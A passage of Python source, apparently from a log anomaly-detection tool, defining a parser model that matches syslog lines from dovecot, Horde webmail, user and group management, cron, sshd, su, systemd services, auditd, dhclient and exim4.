autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), SequenceModelElement("err_open", [ FixedDataModelElement("err_str", b"Error: "), DelimitedDataModelElement("function_name", b"("), FixedDataModelElement("brack_str1", b"("), DelimitedDataModelElement("arg", b")"), FixedDataModelElement("failed_str", b") failed: Permission denied (euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("brack_str2", b"("), DelimitedDataModelElement("euid_user", b")"), FixedDataModelElement("egid_str", b") egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("brack_str3", b"("), DelimitedDataModelElement("egid_user", b")"), FixedDataModelElement("perm_str", b") missing +w perm: "), DelimitedDataModelElement("mail_path", b","), FixedDataModelElement("group_str", b", we're not in group "), DecimalIntegerValueModelElement("group_id"), FixedDataModelElement("brack_str4", b"("), DelimitedDataModelElement("group_name", b")"), FixedDataModelElement("owned_str", b"), dir owned by "), DelimitedDataModelElement("owner", b" "), FixedDataModelElement("mode_str", b" mode="), DelimitedDataModelElement("mode", b")"), FixedDataModelElement("brack_str5", b")"), OptionalMatchModelElement( "set", SequenceModelElement("set", [ FixedDataModelElement("set_str", b" (set"), DelimitedDataModelElement("param", b"="), FixedDataModelElement("equal_str", b"="), DelimitedDataModelElement("val", b")"), FixedDataModelElement("brack_str6", b")") ]) ) ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), ]), ]), SequenceModelElement("imap_login", [ FixedDataModelElement("imap_login_str", b"imap-login: "), FirstMatchModelElement("login", [ SequenceModelElement("disconnected_str", [ FixedDataModelElement("disconnected_str", b"Disconnected "), FirstMatchModelElement("auth", [ SequenceModelElement("auth_failed", [ FixedDataModelElement("auth_failed_str", b"(auth failed, "), DecimalIntegerValueModelElement("attempts"), FixedDataModelElement("attempts_str", b" attempts in "), ]), FixedDataModelElement("no_auth_str", b"(no auth attempts in "), FixedDataModelElement("no_auth_str", b"(disconnected before auth was ready, waited "), ]), DecimalIntegerValueModelElement("duration"), FixedDataModelElement("secs_str", b" secs): "), user_info ]), SequenceModelElement("login", [ FixedDataModelElement("login_str", b"Login: "), user_info ]), SequenceModelElement("anvil", [ FixedDataModelElement("anvil_str", b"Error: anvil:"), AnyByteDataModelElement("anvil_msg") ]), SequenceModelElement("auth_responding", [ FixedDataModelElement("auth_responding_str", b"Warning: Auth process not responding, " b"delayed sending initial response (greeting): "), user_info ]), ]), ]), SequenceModelElement("auth", [ FixedDataModelElement("auth_worker_str", b"auth: "), AnyByteDataModelElement("message") ]), SequenceModelElement("auth_worker", [ FixedDataModelElement("auth_worker_str", b"auth-worker("), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack", b"):"), AnyByteDataModelElement("message") ]), SequenceModelElement("master", [ FixedDataModelElement("master_str", b"master: "), AnyByteDataModelElement("message") ]), SequenceModelElement("ssl_params", [ FixedDataModelElement("ssl_params_str", b"ssl-params: "), AnyByteDataModelElement("message") ]), SequenceModelElement("log", [ FixedDataModelElement("log_str", b"log: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("dovecot2", [ FixedDataModelElement("dovecot_str", b" dovecot["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("warning", [ FixedDataModelElement("log_str", b"Warning: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("chfn", [ FixedDataModelElement("chfn_str", b" chfn["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_user", b"changed user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("information_str", b"' information") ]), SequenceModelElement("horde", [ FixedDataModelElement("horde_str", b" HORDE: "), FirstMatchModelElement("horde", [ SequenceModelElement("imp", [ FixedDataModelElement("succ_str", b"[imp] "), FirstMatchModelElement("imp", [ SequenceModelElement("login", [ FixedDataModelElement("succ_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), DelimitedDataModelElement("ip", b")"), OptionalMatchModelElement( "fwd", SequenceModelElement( "seq", [ FixedDataModelElement("brack_str2", b") ("), DelimitedDataModelElement("forward", b")"), ]) ), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str3", b"}"), ]), SequenceModelElement("message_sent", [ FixedDataModelElement("message_sent_str", b"Message sent to "), DelimitedDataModelElement('recepients', b' from'), FixedDataModelElement("from_str", b" from "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("succ_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str2", b"}"), ]), SequenceModelElement("status", [ FixedDataModelElement("status_str", b'[status] Could not open mailbox "INBOX".'), ]), SequenceModelElement("sync_token", [ FixedDataModelElement("sync_token_str", b"[getSyncToken] IMAP error reported by server."), ]), SequenceModelElement("auth_failed", [ FixedDataModelElement("bracket", b"["), DelimitedDataModelElement("type", b"]"), FixedDataModelElement("auth_failed_str", b"] Authentication failed."), ]), ]), ]), SequenceModelElement("horde", [ FixedDataModelElement("succ_str", b"[horde] "), FirstMatchModelElement("horde", [ SequenceModelElement("success", [ FixedDataModelElement("success_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("success", [ FixedDataModelElement("success_str", b"User "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" logged out of Horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("failed_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("to_horde_str", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b")"), ]), ]) ]), SequenceModelElement("function", [ FixedWordlistDataModelElement("horde_function", [b"[nag]", b"[turba]", b"[horde]"]), FixedDataModelElement("nag_str", b" PHP ERROR: "), FirstMatchModelElement("php_error", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function_name1", b"("), FixedDataModelElement("brack_str1", b"("), OptionalMatchModelElement( "arg1", DelimitedDataModelElement("arg1", b")") ), FixedDataModelElement("failed_str", b") should be compatible with "), DelimitedDataModelElement("function_name2", b"("), FixedDataModelElement("brack_str2", b"("), OptionalMatchModelElement( "arg2", DelimitedDataModelElement("arg2", b")") ), FixedDataModelElement("brack_str3", b")"), ]), FixedDataModelElement("file_str", b"finfo_file(): Empty filename or path"), FixedDataModelElement("header_str", b"Cannot modify header information - headers already sent") ]) ]), SequenceModelElement("guest", [ FixedDataModelElement("guest_str", b"Guest user is not authorized for Horde (Host: "), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b").") ]), SequenceModelElement("php_error", [ FixedDataModelElement("php_error_str", b"PHP ERROR: "), DelimitedDataModelElement("msg", b" ["), ]), SequenceModelElement("free_msg", [ DelimitedDataModelElement("msg", b" ["), ]) ]), FixedDataModelElement("to_str", b" [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("line_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("of_str", b' of "'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("brack_str", b'"]') ]), SequenceModelElement("useradd", [ FixedDataModelElement("useradd_str", b" useradd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"add '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("cmd_str", b"' to "), OptionalMatchModelElement("shadow", FixedDataModelElement("shadow", b"shadow ")), FixedDataModelElement("group_str", b"group '"), DelimitedDataModelElement("group", b"'"), FixedDataModelElement("quote_str", b"'") ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("groupadd", [ FixedDataModelElement("groupadd_str", b" groupadd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"group added to "), DelimitedDataModelElement("path", b":"), FixedDataModelElement("cmd_str", b": name="), FirstMatchModelElement("fm", [ SequenceModelElement("gid", [ DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]), AnyByteDataModelElement("group") ]) ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("chpasswd", [ FixedDataModelElement("chpasswd_str", b" chpasswd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("pw_changed", b"): password changed for "), AnyByteDataModelElement("user") ]), SequenceModelElement("usermod", [ FixedDataModelElement("usermod_str", b" usermod["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"change user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("pw_str", b"' password") ]), SequenceModelElement("chage", [ FixedDataModelElement("usermod_str", b" chage["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"changed password expiry for "), AnyByteDataModelElement("user") ]), SequenceModelElement("cron", [ FixedWordlistDataModelElement("cron_str", [b" CRON[", b" cron["]), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("cron", [ SequenceModelElement("cmd", [ FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("cmd_str", b") CMD "), AnyByteDataModelElement("cmd_msg") ]), SequenceModelElement("session", [ # This only occurs in auth.log DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("pidfile", [ FixedDataModelElement("str", b"(CRON) INFO (pidfile fd = "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("crontab", [ FixedDataModelElement("crontab_str", b" crontab["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("crontab", [ SequenceModelElement("command", [ FixedDataModelElement("bracket", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b") "), FixedWordlistDataModelElement("command", [b"REPLACE", b"LIST"]), FixedDataModelElement("bracket", b" ("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("sudo", [ FixedDataModelElement("cron_str", b" sudo: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("auth", [ # This only occurs in auth.log FixedDataModelElement("auth_str", b" auth: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): authentication failure; logname="), OptionalMatchModelElement( "logname", DelimitedDataModelElement("logname", b" ") ), FixedDataModelElement("uid_str", b" uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("euid_str", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("tty_str", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("ruser_str", b" ruser="), DelimitedDataModelElement("ruser", b" "), FixedDataModelElement("rhost_str", b" rhost="), IpAddressDataModelElement("rhost"), OptionalMatchModelElement( "user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b" user="), VariableByteDataModelElement("user", alphabet) ]) ) ]), SequenceModelElement("systemd", [ FixedDataModelElement("systemd_str", b" systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd2", [ FixedDataModelElement("systemd_str", b" systemd: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("systemd-modules-load", [ FixedDataModelElement("systemd_str", b" systemd-modules-load["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("inserted", b"Inserted module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("apo", b"'") ]), SequenceModelElement("systemd-networkd-wait-online", [ FixedDataModelElement("systemd_str", b" systemd-networkd-wait-online["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedWordlistDataModelElement("inserted", [b"managing", b"ignoring"]), FixedDataModelElement("sp", b": "), AnyByteDataModelElement("interface") ]), SequenceModelElement("systemd-fsck", [ FixedDataModelElement("systemd_str", b" systemd-fsck["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd-udevd", [ FixedDataModelElement("systemd_str", b" systemd-udevd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("sshd", [ FixedDataModelElement("systemd_str", b" sshd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FirstMatchModelElement("message", [ SequenceModelElement("session", [ FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("session", [ FixedDataModelElement("changed_pw", b"): password changed for "), AnyByteDataModelElement("group") ]) ]) ]), SequenceModelElement("publickey", [ FixedDataModelElement("publickey_str", b"Accepted publickey for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("rsa", b" ssh2: RSA "), AnyByteDataModelElement("rsa"), ]), SequenceModelElement("ident", [ FixedDataModelElement("ident_str", b"Did not receive identification string from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("listening", [ FixedDataModelElement("listening_str", b"Server listening on "), DelimitedDataModelElement("ip", b" "), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("signal", [ FixedDataModelElement("signal_str", b"Received signal"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("rec_disconnected", [ FixedDataModelElement("rec_disconnected_str", b"Received disconnect from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from "), OptionalMatchModelElement("user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b"user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), ])), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), FixedDataModelElement("timeout", b"Timeout, client not responding.") ]) ]), SequenceModelElement("su", [ FixedDataModelElement("systemd_str", b" su["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ), ]), SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"Successful su for "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("by_str", b" by "), VariableByteDataModelElement("su_user", alphabet), ]), SequenceModelElement("seq2", [ FixedDataModelElement("plus", b"+"), AnyByteDataModelElement("msg") ]), ]), ]), SequenceModelElement("kernel", [ FixedDataModelElement("kernel_str", b" kernel"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("brack_str", b"["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]") ]) ), FixedDataModelElement("col_str", b": "), AnyByteDataModelElement("kernel_msg") ]), SequenceModelElement("augenrules", [ FixedDataModelElement("augenrules_str", b" augenrules["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("augenrules_msg") ]), SequenceModelElement("auditd", [ FixedDataModelElement("auditd_str", b" auditd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("auditd2", [ FixedDataModelElement("auditd2_str", b" auditd: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("audispd", [ FixedDataModelElement("audispd_str", b" audispd: "), AnyByteDataModelElement("audispd_msg") ]), SequenceModelElement("liblogging", [ FixedDataModelElement("liblogging_str", b" liblogging-stdlog: "), AnyByteDataModelElement("liblogging_msg") ]), SequenceModelElement("os_prober", [ FixedDataModelElement("os_prober_str", b" os-prober: "), AnyByteDataModelElement("os_prober_msg") ]), SequenceModelElement("macosx_prober", [ FixedDataModelElement("macosx_prober_str", b" macosx-prober: "), AnyByteDataModelElement("macosx_prober_msg") ]), SequenceModelElement("haiku", [ FixedDataModelElement("haiku_str", b" 83haiku: "), AnyByteDataModelElement("haiku_msg") ]), SequenceModelElement("efi", [ FixedDataModelElement("efi_str", b" 05efi: "), AnyByteDataModelElement("efi_msg") ]), SequenceModelElement("freedos", [ FixedDataModelElement("freedos_str", b" 10freedos: "), AnyByteDataModelElement("freedos_msg") ]), SequenceModelElement("qnx", [ FixedDataModelElement("qnx_str", b" 10qnx: "), AnyByteDataModelElement("qnx_msg") ]), SequenceModelElement("microsoft", [ FixedDataModelElement("microsoft_str", b" 20microsoft: "), AnyByteDataModelElement("microsoft_msg") ]), SequenceModelElement("utility", [ FixedDataModelElement("utility_str", b" 30utility: "), AnyByteDataModelElement("utility_msg") ]), SequenceModelElement("mounted_tests", [ FixedDataModelElement("mounted_tests_str", b" 50mounted-tests: "), AnyByteDataModelElement("mounted_tests_msg") ]), SequenceModelElement("rsyslogd", [ FixedDataModelElement("rsyslogd_str", b" rsyslogd: "), AnyByteDataModelElement("rsyslogd_msg") ]), SequenceModelElement("timesyncd", [ FixedDataModelElement("timesyncd_str", b" systemd-timesyncd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("timesyncd_msg") ]), SequenceModelElement("logind", [ FixedDataModelElement("logind_str", b" systemd-logind["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("new_str", b"New session "), DelimitedDataModelElement("session", b" "), FixedDataModelElement("str", b" of user"), AnyByteDataModelElement("user"), ]), SequenceModelElement("removed", [ FixedDataModelElement("removed_str", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("system_buttons", [ FixedDataModelElement("watching", b"Watching system buttons on /dev/input/event"), AnyByteDataModelElement("event_type") ]), FixedDataModelElement("new_seat", b"New seat seat0.") ])]), SequenceModelElement("grub", [ FixedDataModelElement("grub_str", b" grub-common["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("grub_msg") ]), SequenceModelElement("polkitd", [ FixedDataModelElement("polkitd_str", b" polkitd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("polkitd_msg") ]), SequenceModelElement("dbus", [ FixedDataModelElement("dbus_str", b" dbus-daemon["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("dbus_msg") ]), SequenceModelElement("hostnamed", [ FixedDataModelElement("hostnamed_str", b" systemd-hostnamed["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("hostnamed_msg") ]), SequenceModelElement("apport", [ FixedDataModelElement("apport_str", b" apport["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("apport_msg") ]), SequenceModelElement("resolved", [ FixedDataModelElement("resolved_str", b" systemd-resolved["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("resolved_msg") ]), SequenceModelElement("networkd", [ FixedDataModelElement("networkd_str", b" systemd-networkd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("networkd_msg") ]), SequenceModelElement("networkd-dispatcher", [ FixedDataModelElement("networkd_str", b" networkd-dispatcher["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("no_valid_path", b"No valid path found for "), AnyByteDataModelElement("interface") ]), SequenceModelElement("motd", [ FixedDataModelElement("motd_str", b" 50-motd-news["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("motd_msg") ]), SequenceModelElement("freshclam", [ FixedDataModelElement("freshclam_str", b" freshclam["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("freshclam_msg") ]), SequenceModelElement("dhclient", [ FixedDataModelElement("dhclient_str", b" dhclient["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", FirstMatchModelElement("dhclient", [ SequenceModelElement("dhcprequest", [ FixedDataModelElement("dhcprequest_str", b"DHCPREQUEST of "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("on_str", b" on "), DelimitedDataModelElement("network_interface", b" "), FixedDataModelElement("to_str", b" to "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("xid", SequenceModelElement("xid", [ FixedDataModelElement("xid", b" (xid=0x"), HexStringModelElement("hex"), FixedDataModelElement("bracket", b")") ])) ]), SequenceModelElement("dhcpack", [ FixedDataModelElement("dhcpack_str", b"DHCPACK of "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("on_str", b" from "), IpAddressDataModelElement("src_ip") ]), SequenceModelElement("bound", [ FixedDataModelElement("bound_str", b"bound to "), IpAddressDataModelElement("ip"), FixedDataModelElement("renewal_str", b" -- renewal in "), DecimalIntegerValueModelElement("seconds"), FixedDataModelElement("seconds_str", b" seconds.") ]), AnyByteDataModelElement("skipped_msg") ])), ]), SequenceModelElement("apparmor", [ FixedDataModelElement("apparmor_str", b" apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd-apparmor", [ FixedDataModelElement("snapd-apparmor_str", b" snapd-apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd", [ FixedDataModelElement("snapd_str", b" snapd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("cloud-init", [ FixedDataModelElement("cloud-init_str", b" cloud-init"), OptionalMatchModelElement("pid", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("irqbalance", [ FixedDataModelElement("irqbalance_str", b" /usr/sbin/irqbalance"), AnyByteDataModelElement("msg")]), SequenceModelElement("pollinate", [ FixedDataModelElement("pollinate_str", b" pollinate["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("lxcfs", [ FixedDataModelElement("lxcfs_str", b" lxcfs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("accounts-daemon", [ FixedDataModelElement("accounts-daemon_str", b" accounts-daemon["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ec2", [ FixedDataModelElement("ec2_str", b" ec2: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("dnsmasq", [ FixedDataModelElement("dnsmasq_str", b" dnsmasq["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("etc_maradns_mararc", [ FixedDataModelElement("etc_maradns_mararc_str", b" etc_maradns_mararc["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("etc_maradns_mararc-zs", [ FixedDataModelElement("etc_maradns_mararc-zs_str", b" etc_maradns_mararc-zs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("ifup", [ FixedDataModelElement("ifup_str", b" ifup["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("root", [ FixedDataModelElement("root_str", b" root: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntpd", [ FixedDataModelElement("ntpd_str", b" ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntp", [ FixedDataModelElement("ntp_str", b" ntp["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("exim4", [ FixedDataModelElement("exim4_str", b" exim4"), OptionalMatchModelElement("opt", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon_str1", b": "), 